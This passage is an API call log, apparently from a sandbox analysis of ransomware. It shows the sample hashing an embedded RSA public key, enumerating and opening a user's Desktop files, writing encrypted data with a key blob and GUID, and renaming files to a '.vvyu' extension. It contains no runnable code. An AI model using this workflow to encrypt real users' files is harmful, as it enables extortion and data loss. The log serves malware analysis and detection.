0x29f7da0 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea338 | out: hHeap=0x2c0000) returned 1 [0196.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.542] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x4e19, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x4e19, lpOverlapped=0x0) returned 1 [0196.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.543] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4e1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.543] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.544] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.545] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.545] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.545] CloseHandle (hObject=0x584) returned 1 [0196.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0196.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0196.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0196.547] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\adViIyse_4wpfxq.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\adviiyse_4wpfxq.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\adViIyse_4wpfxq.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\adviiyse_4wpfxq.mp4.vvyu")) returned 1 [0196.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.549] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.552] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192ea7a0, ftCreationTime.dwHighDateTime=0x1d89c59, ftLastAccessTime.dwLowDateTime=0x9784cd40, ftLastAccessTime.dwHighDateTime=0x1d8a3e9, ftLastWriteTime.dwLowDateTime=0x9784cd40, ftLastWriteTime.dwHighDateTime=0x1d8a3e9, nFileSizeHigh=0x0, nFileSizeLow=0x8fe7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BXV5Ql2Id 9hKdXPV7.swf", cAlternateFileName="BXV5QL~1.SWF")) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0196.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.552] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\BXV5Ql2Id 9hKdXPV7.swf") returned=".swf" [0196.553] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\BXV5Ql2Id 9hKdXPV7.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\bxv5ql2id 9hkdxpv7.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.554] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=36839) returned 1 [0196.554] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.558] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8fc1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.558] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.561] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.561] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x8fe7, lpOverlapped=0x0) returned 1 [0196.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.562] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.562] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.563] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.563] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.564] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.564] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.564] GetLastError () returned 0x0 [0196.564] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0196.564] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.564] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.564] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.564] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ff0) returned 0x2af5168 [0196.565] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea338 [0196.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea380 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.566] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6638 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.569] HeapFree (in: hHeap=0x2c0000, 